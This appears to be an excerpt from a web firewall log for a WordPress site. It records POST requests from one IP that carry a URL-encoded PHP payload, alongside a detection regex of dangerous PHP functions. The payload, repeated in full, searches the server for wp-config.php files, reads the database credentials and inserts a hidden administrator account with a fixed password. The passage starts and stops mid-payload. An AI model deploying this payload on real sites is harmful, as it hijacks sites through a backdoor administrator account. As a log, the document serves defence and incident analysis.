0%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:06:35","213.209.159.254","POST","\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> TH:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php HTTP\/1.1\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-site:none\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\ncontent-length:12640\ncookie:4=e367ba33cbb513d4c0b57eb3026dd8cc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvIRtvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWdqKA0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nTH=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:07:01","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> zv:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%